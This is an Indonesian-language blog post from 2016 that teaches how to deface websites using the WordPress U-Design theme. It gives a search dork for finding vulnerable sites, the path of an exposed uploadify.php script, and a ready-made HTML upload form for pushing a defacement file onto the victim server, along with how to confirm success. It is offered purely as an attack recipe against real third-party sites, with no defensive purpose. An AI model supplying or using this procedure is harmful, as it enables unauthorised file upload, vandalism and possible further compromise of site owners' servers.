Kamis, 29 Desember 2016

Deface Teknik Wp-Themes U-Design

Dork :   Inurl:/themes/u-design/

* Kembangkan Lagi Dork'Nya. *

Exploit :   /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php

Langsung Ke Tutorialnya Yak   ;v

1. Masukan Dork Ke Search Engine .

2. Pilih Salah Satu Target Yang Ingin Di cRooTz   xD

3. Masukan Exploitnya .
 Contoh : localhost /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php

Vuln ? Page Blank!


4. Lalu Copy CSRF Ini.

<form method="POST" action=" URL PAGE BLANK "
enctype="multipart/form-data"><input type="file" name="Filedata" />
<button>Upload?</button><br/>
</form>

Simpan Ex.HTML / HTM [All Files]

5. Dan Buka CSRF Tersebut , Lalu Upload File Deface Kamu .txt


Jika Berhasil Nanti Akan Muncul Angka "1"

6. Selesai , Letak File Deface ?
 localhost /File-Deface.ext

0 komentar

Posting Komentar